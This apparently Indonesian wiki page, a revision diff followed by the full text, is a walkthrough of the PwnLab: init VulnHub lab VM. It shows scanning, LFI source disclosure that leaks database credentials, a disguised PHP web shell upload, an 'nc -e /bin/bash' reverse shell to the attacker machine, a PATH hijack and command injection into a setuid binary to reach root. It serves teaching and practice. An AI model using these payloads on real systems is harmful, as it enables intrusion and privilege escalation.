/bin/echo %s >> /root/messages.txt
 +
.....
 +
.....
 +
_ITM_registerTMCloneTable
 +
_init
 +
mike@pwnlab:/home/mike$
  
  
Now that we have a root shell, cd into the root directory and cat flag.txt
+
Hmm… msg2root tampaknya merupakan coding kira-kira:
  
.
+
#include <iostream> 
 +
 
 +
char msg[1024];  //Let's assume no BO takes place, alrighty? 
 +
char command[1024]; 
 +
 
 +
int main() 
 +
 +
  printf("Message for root: "); 
 +
  scanf("%s", msg); 
 +
  snprintf(command, sizeof(command), "/bin/echo %s >> /root/messages.txt", msg); 
 +
  system(command); 
 +
}
  
And that’s it.
+
Mari ujicoba masuk ke root,
  
Overall this was a challenging vm for me, but so much fun and really learnt a lot in the process.
+
mike@pwnlab:/home/mike$ ./msg2root
 +
./msg2root
 +
Message for root: opensesame; bash -p
 +
opensesame; bash -p
 +
opensesame
 +
bash-4.3# whoami
 +
whoami
 +
root
 +
bash-4.3# ls -al
 +
ls -al
 +
total 28
 +
drwxr-x--- 2 mike mike 4096 Mar 17  2016 .
 +
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
 +
-rw-r--r-- 1 mike mike  220 Mar 17  2016 .bash_logout
 +
-rw-r--r-- 1 mike mike 3515 Mar 17  2016 .bashrc
 +
-rwsr-sr-x 1 root root 5364 Mar 17  2016 msg2root
 +
-rw-r--r-- 1 mike mike  675 Mar 17  2016 .profile
  
Thanks for reading through, until next time, stay classy.
+
bash-4.3# cd /root
 +
cd /root
 +
bash-4.3# ls -al
 +
ls -al
 +
total 20
 +
drwx------  2 root root 4096 Mar 17  2016 .
 +
drwxr-xr-x 21 root root 4096 Mar 17  2016 ..
 +
lrwxrwxrwx  1 root root    9 Mar 17  2016 .bash_history -> /dev/null
 +
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
 +
----------  1 root root 1840 Mar 17  2016 flag.txt
 +
lrwxrwxrwx  1 root root    9 Mar 17  2016 messages.txt -> /dev/null
 +
lrwxrwxrwx  1 root root    9 Mar 17  2016 .mysql_history -> /dev/null
 +
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
  
 +
bash-4.3# cat /root/flag.txt   
 +
cat /root/flag.txt
 +
.-=~=-.                                                                .-=~=-.
 +
(__  _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__  _)
 +
(_ ___)  _____                            _                            (_ ___)
 +
(__  _) /  __ \                          | |                          (__  _)
 +
( _ __) | /  \/ ___  _ __  __ _ _ __ __ _| |_ ___                      ( _ __)
 +
(__  _) | |    / _ \| '_ \ / _` | '__/ _` | __/ __|                    (__  _)
 +
(_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \                    (_ ___)
 +
(__  _)  \____/\___/|_| |_|\__, |_|  \__,_|\__|___/                    (__  _)
 +
( _ __)                    __/ |                                      ( _ __)
 +
(__  _)                    |___/                                        (__  _)
 +
(__  _)                                                                (__  _)
 +
(_ ___) If  you are  reading this,  means  that you have  break 'init'  (_ ___)
 +
( _ __) Pwnlab.  I hope  you enjoyed  and thanks  for  your time doing  ( _ __)
 +
(__  _) this challenge.                                                (__  _)
 +
(_ ___)                                                                (_ ___)
 +
( _ __) Please send me  your  feedback or your  writeup,  I will  love  ( _ __)
 +
(__  _) reading it                                                      (__  _)
 +
(__  _)                                                                (__  _)
 +
(__  _)                                            For sniferl4bs.com  (__  _)
 +
( _ __)                                claor@PwnLab.net - @Chronicoder  ( _ __)
 +
(__  _)                                                                (__  _)
 +
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
 +
`-._.-'                                                                `-._.-'
  
 +
bash-4.3#
  
 
==Referensi==
 
==Referensi==
  
* https://alexsemaan.au/2017/02/20/vulnhub-pwnlabinit-walkthrough/
+
* https://www.abatchy.com/2016/11/pwnlab-init-walkthrough-vulnhub.html

Latest revision as of 09:01, 24 January 2023

Objective / Goal

  • masuk ke sistem
  • dapat root

Download & Masukan ke VirtualBox

https://www.vulnhub.com/entry/pwnlab-init,158/#download
https://download.vulnhub.com/pwnlab/pwnlab_init.ova

Import pwnlab_init.ova ke VirtualBox

  • Load VirtualBox
  • Import


Kali Linux

Cek IP address VM

sudo su                             
netdiscover -r 192.168.0.0/24

Hasilnya kira-kira

Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                                       
                                                                                                                                                                                     
 29 Captured ARP Req/Rep packets, from 20 hosts.   Total size: 1740                                                                                                                  
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.0.2     40:16:7e:22:e7:69      1      60  ASUSTek COMPUTER INC.                                                                                                             
 192.168.0.4     10:6f:3f:3d:73:d0      1      60  BUFFALO.INC                                                                                                                       
 192.168.0.7     4c:e6:76:1f:15:4b      1      60  BUFFALO.INC                                                                                                                       
 192.168.0.9     10:6f:3f:17:94:94      1      60  BUFFALO.INC                                                                                                                       
 192.168.0.7     4c:e6:76:1f:15:4c      1      60  BUFFALO.INC                                                                                                                       
 192.168.0.60    74:d0:2b:6a:a9:66      1      60  ASUSTek COMPUTER INC.                                                                                                             
 192.168.0.101   08:60:6e:db:4e:b8      1      60  ASUSTek COMPUTER INC.                                                                                                             
 192.168.0.130   08:00:27:93:a2:1b      1      60  PCS Systemtechnik GmbH                                                                                                            
 192.168.0.141   b0:a7:b9:b6:c1:c9      2     120  TP-Link Corporation Limited                                                                                                       
 192.168.0.145   c0:56:27:1c:be:e1      1      60  Belkin International Inc.                                                                                                         
 192.168.0.169   4c:e6:76:1f:15:4b      1      60  BUFFALO.INC                                                                                                                       
 192.168.0.170   4c:e6:76:1f:15:4b      1      60  BUFFALO.INC                                                                                                                       
 192.168.0.169   4c:e6:76:1f:15:4c      4     240  BUFFALO.INC                                                                                                                       
 192.168.0.170   4c:e6:76:1f:15:4c      1      60  BUFFALO.INC                                                                                                                       
 192.168.0.199   b4:b0:24:3d:8b:3b      1      60  TP-Link Corporation Limited                                                                                                       
 192.168.0.102   6c:29:90:1e:89:7f      1      60  WiZ Connected Lighting Company Limited                                                                                            
 192.168.0.223   c0:56:27:67:0d:a3      1      60  Belkin International Inc.                                                                                                         
 192.168.0.222   6c:16:32:63:52:21      3     180  HUAWEI TECHNOLOGIES CO.,LTD                                                                                                       
 192.168.0.224   28:ff:3e:5c:10:32      4     240  zte corporation                                                                                                                   
 192.168.0.194   52:aa:ba:2c:0b:15      1      60  Unknown vendor   

MAC address yang mencurigakan adalah 08:00:..... IP address target: 192.168.1.130.

Enumeration target

Gunakan nmap -v -A ke IP address sasaran,

nmap -v -A 192.168.0.130

Hasilnya kira-kira,

Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-22 03:45 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:45
Completed NSE at 03:45, 0.00s elapsed
Initiating NSE at 03:45
Completed NSE at 03:45, 0.00s elapsed
Initiating NSE at 03:45
Completed NSE at 03:45, 0.00s elapsed
Initiating ARP Ping Scan at 03:45
Scanning 192.168.0.130 [1 port]
Completed ARP Ping Scan at 03:45, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:45
Completed Parallel DNS resolution of 1 host. at 03:45, 0.00s elapsed
Initiating SYN Stealth Scan at 03:45
Scanning 192.168.0.130 [1000 ports]
Discovered open port 111/tcp on 192.168.0.130
Discovered open port 3306/tcp on 192.168.0.130
Discovered open port 80/tcp on 192.168.0.130
Completed SYN Stealth Scan at 03:45, 0.11s elapsed (1000 total ports)
Initiating Service scan at 03:45
Scanning 3 services on 192.168.0.130
Completed Service scan at 03:45, 6.05s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.130
NSE: Script scanning 192.168.0.130.
Initiating NSE at 03:45
Completed NSE at 03:45, 0.19s elapsed
Initiating NSE at 03:45
Completed NSE at 03:45, 0.03s elapsed
Initiating NSE at 03:45
Completed NSE at 03:45, 0.00s elapsed
Nmap scan report for 192.168.0.130
Host is up (0.00057s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: PwnLab Intranet Image Hosting
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36677/udp6  status
|   100024  1          38362/tcp6  status
|   100024  1          47606/udp   status
|_  100024  1          48220/tcp   status
3306/tcp open  mysql   MySQL 5.5.47-0+deb8u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.47-0+deb8u1
|   Thread ID: 38
|   Capabilities flags: 63487
|   Some Capabilities: Support41Auth, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, 
SupportsLoadDataLocal, InteractiveClient, IgnoreSigpipes, LongPassword, 
ConnectWithDatabase, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, 
SupportsTransactions, FoundRows, SupportsCompression, LongColumnFlag, ODBCClient, 
SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: -G^"+S@(D]'IzNT:dlpn
|_  Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:93:A2:1B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.016 days (since Sun Jan 22 03:22:46 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT     ADDRESS
1   0.57 ms 192.168.0.130

NSE: Script Post-scanning.
Initiating NSE at 03:45
Completed NSE at 03:45, 0.00s elapsed
Initiating NSE at 03:45
Completed NSE at 03:45, 0.00s elapsed
Initiating NSE at 03:45
Completed NSE at 03:45, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.08 seconds
           Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.290KB)

Alternatif lain menggunakan onetwopunch.sh script yang bisa di ambil di

https://github.com/superkojiman/onetwopunch/blob/master/onetwopunch.sh

Caranya,

onetwopunch.sh -t targets -p all -n "-sV -O --version-intensity=9"  

Dari hasil nmap, terlihat dengan jelas beberapa hal yang menarik dari sasaran,

  • Ada Web Server
  • Ada Database Server

Investigasi HTTP requests/responds

Untuk investigasi HTTP requests/responses

Tools: Burp Suite, Fiddler, Tamper Data/Cookies Manager+ (FF addons)
Scan vulnerability (outdated version, LFI/RFI, SQLi, …)

Tools: Nikto, sqlmap, nmap scripts
Mencari hidden/misconfigured directori atau file

Tools: Dirbuster, GoBuster, Nikto

atau

Jalankan nikto,

nikto -host 192.168.0.130

Hasilnya,

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.130
+ Target Hostname:    192.168.0.130
+ Target Port:        80
+ Start Time:         2023-01-22 04:01:12 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Cookie PHPSESSID created without the httponly flag
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7915 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2023-01-22 04:02:08 (GMT-5) (56 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Disini yang menarik, kita menemukan,

  • config.php kemungkinan ada username/password untuk akses database.
  • login form, yang perlu di investigasi lebih lanjut, contoh
http://192.168.0.130/?page=login. Possibly vulnerable to LFI.

kemungkinan vulnerable untuk LFI (Local Inclusion File).

Bruteforcing MySQL

Percobaan untuk bruteforcing MySQL secara manual,

mysql -h 192.168.0.130 -u root -p
Enter password: (kosong)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.0.62' (using password: NO)
mysql -h 192.168.0.130 -u root -p
Enter password: (root)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.0.62' (using password: YES)

Naga-naga-nya kita tidak bisa menembus secara manual.


Cek Web

Login Page

Login Page

http://192.168.0.130/login.php

Coba menggunakan SQL Injection attack,

sqlmap -u "http://192.168.0.130/?page=login" --data="user=abcd&pass=abcd&submit=Login" --level=5 --risk=3 --dbms=mysql

hasilnya ..

.....
[04:51:46] [WARNING] parameter 'Host' does not seem to be injectable
[04:51:46] [CRITICAL] all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[04:51:46] [WARNING] your sqlmap version is outdated

[*] ending @ 04:51:46 /2023-01-22/

Usaha sql injection gagal, kita coba vulnerable to LFI.

LFI vulnerability

Local File Inclusion (LFI) vulnerability yang sering ditemukan dalam aplikasi web yang ditulis dengan buruk. Kerentanan ini terjadi ketika aplikasi web memungkinkan pengguna mengirimkan input ke dalam file atau mengunggah file ke server. Silahkan baca2 https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/

Contoh LFI code:

<?php  
   if (isset($_GET['page']))  
   {  
      include($_GET['page'] . '.php');  
   }  
?>  

Kita coba URL di bawah (gagal total),

http://192.168.0.130/?page=/etc/passwd
http://192.168.0.130/?page=/etc/passwd
http://192.168.0.130/?page=../../../../../../../etc/passwd
http://192.168.0.130/?page=../../../../../../../etc/passwd

Gunakan PHP filter untuk meng-encode .php file content ke base64 string sehingga kita bisa mem-bypass server agak tidak meng-eksekusi file .php yang kita ambil. Tampaknya teknik ini berhasil,

http://192.168.0.130/?page=php://filter/convert.base64-encode/resource=config

Kita bisa dapat config.php:

<?php
$server   = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>

Keren! kita dapat username password MySQL.

Mari kita lanjutkan analisa menggunakan PHP filter,

http://192.168.0.130/?page=php://filter/convert.base64-encode/resource=index 

Kita dapat index.php:

<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
	include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
< img src="images/pwnlab.png">< br />
[ < a href="/">Home</a> ][ < a href="?page=login">Login</a> ][ < a href="? page=upload">Upload</a> ]
< hr />< br />
<?php
    if (isset($_GET['page'])) 
       {
               include($_GET['page'].".php");
       }
       else
       {
               echo "Use this server to upload and share image files inside the intranet";
       }
?>
</body>
</html>


Lines 4-6: LFI vulnerability, jika kita set sebuah cookie dengan name _lang _ pointing ke sebuah file di file sistem, maka file tersebut akan di include. Kita bahkan tidak perlu pening menambahkan .php di belakangnya!
Lines 20-23: LFI vulnerability kita dapat source codenya terima kasih banyak.
http://192.168.0.130/?page=php://filter/convert.base64-encode/resource=upload

Upload.php

<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
       <body>
               <form action= method='post' enctype='multipart/form-data'>
                       <input type='file' name='file' id='file' />
                       <input type='submit' name='submit' value='Upload'/>
               </form>
       </body>
</html>
<?php 
if(isset($_POST['submit'])) {
       if ($_FILES['file']['error'] <= 0) {
               $filename  = $_FILES['file']['name'];
               $filetype  = $_FILES['file']['type'];
               $uploaddir = 'upload/';
               $file_ext  = strrchr($filename, '.');
               $imageinfo = getimagesize($_FILES['file']['tmp_name']);
               $whitelist = array(".jpg",".jpeg",".gif",".png"); 

               if (!(in_array($file_ext, $whitelist))) {
                       die('Not allowed extension, please upload images only.');
               }

               if(strpos($filetype,'image') === false) {
                       die('Error 001');
               }

               if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
                       die('Error 002');
               }

               if(substr_count($filetype, '/')>1){
                       die('Error 003');
               }

               $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

               if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
                       echo "<img src=\"".$uploadfile."\">
"; } else { die('Error 4'); } } } ?>


Sampai titik ini kita mengexploit page yang kita lihat di atas. Tapi tampaknya banyak hal yang menarik di page tersebut.

Lines 2-3: Ini yang tampaknya men-deny waktu kita akses.
Lines 16-49: Banyak kondisi untuk upload sebuah file:
Err 0: Whitelist untuk file dengan ending .jpg, ,jpeg, .gif dan .png
Err 1: File is not identified as an image
Err 2: HEX signature validation?
Err 3: File name contains ‘/’ to avoid LFI
Err 4: Failed to upload file

Akses MySQL

Selanjutnya kita akan melihat kemungkinan untuk upload backdoor. Kita perlu mengakses page ini. Mari kita coba akses database MySQL menggunakan username password yang kita temukan di config.php.

mysql -h 192.168.0.130 -u root -p  
Enter password:  
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 21180
Server version: 5.5.47-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> 
MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| Users              |
+--------------------+
2 rows in set (0.001 sec)


MySQL [(none)]>
MySQL [(none)]> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [Users]> 
MySQL [Users]>
MySQL [Users]> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users           |
+-----------------+
1 row in set (0.001 sec)

MySQL [Users]> 
MySQL [Users]>
MySQL [Users]> select * from users;
+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.001 sec)

MySQL [Users]> 

Password tampaknya base64, jika kita decode misalnya via https://www.base64decode.org/, kita akan dapat,

kent: JWzXuBJJNy
mike: SIfdsTEn6I
kane: iSv5Ym2GRo

Uploading backdoor

Menggunakan salah satu username password yang tersedia memungkinkan kita untuk mengakses halaman upload. Yang ingin kita lakukan sekarang adalah menemukan cara untuk mendapatkan shell.

Bagaimana dengan mengunggah GIF yang berisi kode PHP, dan memasukkannya ke dalam kerentanan LFI yang kami temukan sebelumnya (cookie lang)?


Buat fake PNG file berisi PHP code

Buat fake png file berisi PHP code,

GIF89;  
<?php system($_GET["cmd"]) ?>  


GIF89 digunakan untuk mem-bypass type check, informasi lebih lanjut bisa di baca2 di https://en.wikipedia.org/wiki/List_of_file_signatures .

Lakukan,

  • Login ke pwnlab menggunakan
kent: JWzXuBJJNy
mike: SIfdsTEn6I
kane: iSv5Ym2GRo

File PNG biasanya di simpan dalam md5 hash. Ini bisa dilihat menggunakan CRTL-U dari browser, terlihat md5 hash dari file png yang kita gunakan,

../upload/d1a17e1e32f2bfa1b90a6754cadd1df8.png

Set lang cookie agar memasukan image yang kita upload

Jika menggunakan chrome, bisa masuk ke Developer Tools (Ctrl-Shift-J atau Tools -> Developer Tools) -> Console dan masukan javascript command:

document.cookie="keyofcookie=valueofcookie"

Kita dapat mengganti / menambahkan new cookie menggunakan teknik ini. Kita juga dapat memasukan multiple cooke seperti,

document.cookie="username=John Doe; expires=Thu, 18 Dec 2013 12:00:00 UTC; path=/";

Dari browser CTRL-SHIFT-J masukan cookies,

document.cookie="lang=../upload/d1a17e1e32f2bfa1b90a6754cadd1df8.png";

Start netcat listener di Kali

Start 4444 listener

nc -nvlp 4444

Browse untuk connect ke port

  • cek IP address kali linux dengan perintah "ifconfig eth0", misalnya hasilnya 192.168.0.62
  • Browse ke URL (perhatikan spasi)
http://192.168.0.130/?cmd=nc -nv 192.168.0.62 4444 -e /bin/bash 

Di kali linux CLI akan ada kata2,

# nc -nvlp 4444  
listening on [any] 4444 ...  
connect to [192.168.0.62] from (UNKNOWN) [192.168.0.130] 60676
whoami  
www-data  
python -c 'import pty; pty.spawn("/bin/bash");'  
www-data@pwnlab:/var/www/html$

Privilege Escalation

coba user kent

Dari shell, Lakukan su ke user kent

cd /home
ls
www-data@pwnlab:/home$ 
ww-data@pwnlab:/home$ ls -al
ls -al
total 24
drwxr-xr-x  6 root root 4096 Mar 17  2016 .
drwxr-xr-x 21 root root 4096 Mar 17  2016 ..
drwxr-x---  2 john john 4096 Mar 17  2016 john
drwxr-x---  2 kane kane 4096 Mar 17  2016 kane
drwxr-x---  2 kent kent 4096 Mar 17  2016 kent
drwxr-x---  2 mike mike 4096 Mar 17  2016 mike
www-data@pwnlab:/home$ 

Lalukan su ke user kent

www-data@pwnlab:/home$ su kent
su kent
Password: JWzXuBJJNy

kent@pwnlab:/home$ cd kent
cd kent
kent@pwnlab:~$ ls -al
ls -al
total 20
drwxr-x--- 2 kent kent 4096 Mar 17  2016 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 kent kent  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 kent kent 3515 Mar 17  2016 .bashrc
-rw-r--r-- 1 kent kent  675 Mar 17  2016 .profile
kent@pwnlab:~$ 


kent@pwnlab:~$ find / -user kent 2>/dev/null  
find / -user kent 2>/dev/null  
.........
/home/kent  
/home/kent/.bashrc  
/home/kent/.profile  
/home/kent/.bash_logout  

coba sudo -l

kent@pwnlab:~$ sudo -l  
sudo -l  
bash: sudo: command not found  

kent tidak bisa sudo :( ..

exit


coba user kane

cd /home
www-data@pwnlab:/home$ su kane
su kane
Password: iSv5Ym2GRo

kane@pwnlab:/home$ cd kane
kane@pwnlab:~$ ls -al
ls -al
total 28
drwxr-x--- 2 kane kane 4096 Mar 17  2016 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 kane kane  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 kane kane 3515 Mar 17  2016 .bashrc
-rwsr-sr-x 1 mike mike 5148 Mar 17  2016 msgmike
-rw-r--r-- 1 kane kane  675 Mar 17  2016 .profile


kane@pwnlab:~$ file msgmike     
file msgmike
msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped
kane@pwnlab:~$ 
kane@pwnlab:~$ strings msgmike  
strings msgmike
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setregid
setreuid
....
....
__TMC_END__
_ITM_registerTMCloneTable
_init
kane@pwnlab:~$

Hmmmm kayanya msgmike berusaha coding menggunakan

int main()  
{  
      system("cat /home/mike/msg.txt");  
}  

Kalau kita menggunakan cat di directory tertentu & override PATH, kita mungkin bisa dapat shell dari mike! Contoh shell scripting bisa di baca2 di root-me.org. Lakukan script di bawah ini,

kane@pwnlab:~$ echo "/bin/bash" > cat
echo "/bin/bash" > cat
kane@pwnlab:~$ chmod 777 cat
chmod 777 cat
kane@pwnlab:~$ export PATH=/home/kane
export PATH=/home/kane
kane@pwnlab:~$ ./msgmike
./msgmike
bash: dircolors: command not found
bash: ls: command not found
mike@pwnlab:~$ 

Jadi mike & jadi root:) ...

Reset PATH variabel terlebih dulu,

mike@pwnlab:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
</usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin                
mike@pwnlab:~$ cd ../mike 
cd ../mike 
mike@pwnlab:/home/mike$ ls -al
ls -al
total 28
drwxr-x--- 2 mike mike 4096 Mar 17  2016 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 mike mike  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 mike mike 3515 Mar 17  2016 .bashrc
-rwsr-sr-x 1 root root 5364 Mar 17  2016 msg2root
-rw-r--r-- 1 mike mike  675 Mar 17  2016 .profile
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: percobaan
percobaan
percobaan
mike@pwnlab:/home/mike$ 

ini bagian yang keren:) ..

mike@pwnlab:/home/mike$ strings msg2root
strings msg2root
/lib/ld-linux.so.2
libc.so.6
.....
.....
Message for root: 
/bin/echo %s >> /root/messages.txt
.....
.....
_ITM_registerTMCloneTable
_init
mike@pwnlab:/home/mike$


Hmm… msg2root tampaknya merupakan coding kira-kira:

#include <iostream>  
  
char msg[1024];  //Let's assume no BO takes place, alrighty?  
char command[1024];   
  
int main()  
{  
 printf("Message for root: ");  
 scanf("%s", msg);  
 snprintf(command, sizeof(command), "/bin/echo %s >> /root/messages.txt", msg);  
 system(command);  
}

Mari ujicoba masuk ke root,

mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: opensesame; bash -p
opensesame; bash -p
opensesame
bash-4.3# whoami
whoami
root
bash-4.3# ls -al
ls -al
total 28
drwxr-x--- 2 mike mike 4096 Mar 17  2016 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 mike mike  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 mike mike 3515 Mar 17  2016 .bashrc
-rwsr-sr-x 1 root root 5364 Mar 17  2016 msg2root
-rw-r--r-- 1 mike mike  675 Mar 17  2016 .profile
bash-4.3# cd /root
cd /root
bash-4.3# ls -al
ls -al
total 20
drwx------  2 root root 4096 Mar 17  2016 .
drwxr-xr-x 21 root root 4096 Mar 17  2016 ..
lrwxrwxrwx  1 root root    9 Mar 17  2016 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
----------  1 root root 1840 Mar 17  2016 flag.txt
lrwxrwxrwx  1 root root    9 Mar 17  2016 messages.txt -> /dev/null
lrwxrwxrwx  1 root root    9 Mar 17  2016 .mysql_history -> /dev/null
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
bash-4.3# cat /root/flag.txt    
cat /root/flag.txt
.-=~=-.                                                                 .-=~=-.
(__  _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__  _)
(_ ___)  _____                             _                            (_ ___)
(__  _) /  __ \                           | |                           (__  _)
( _ __) | /  \/ ___  _ __   __ _ _ __ __ _| |_ ___                      ( _ __)
(__  _) | |    / _ \| '_ \ / _` | '__/ _` | __/ __|                     (__  _)
(_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \                     (_ ___)
(__  _)  \____/\___/|_| |_|\__, |_|  \__,_|\__|___/                     (__  _)
( _ __)                     __/ |                                       ( _ __)
(__  _)                    |___/                                        (__  _)
(__  _)                                                                 (__  _)
(_ ___) If  you are  reading this,  means  that you have  break 'init'  (_ ___)
( _ __) Pwnlab.  I hope  you enjoyed  and thanks  for  your time doing  ( _ __)
(__  _) this challenge.                                                 (__  _)
(_ ___)                                                                 (_ ___)
( _ __) Please send me  your  feedback or your  writeup,  I will  love  ( _ __)
(__  _) reading it                                                      (__  _)
(__  _)                                                                 (__  _)
(__  _)                                             For sniferl4bs.com  (__  _)
( _ __)                                claor@PwnLab.net - @Chronicoder  ( _ __)
(__  _)                                                                 (__  _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-'                                                                 `-._.-'
bash-4.3#

Referensi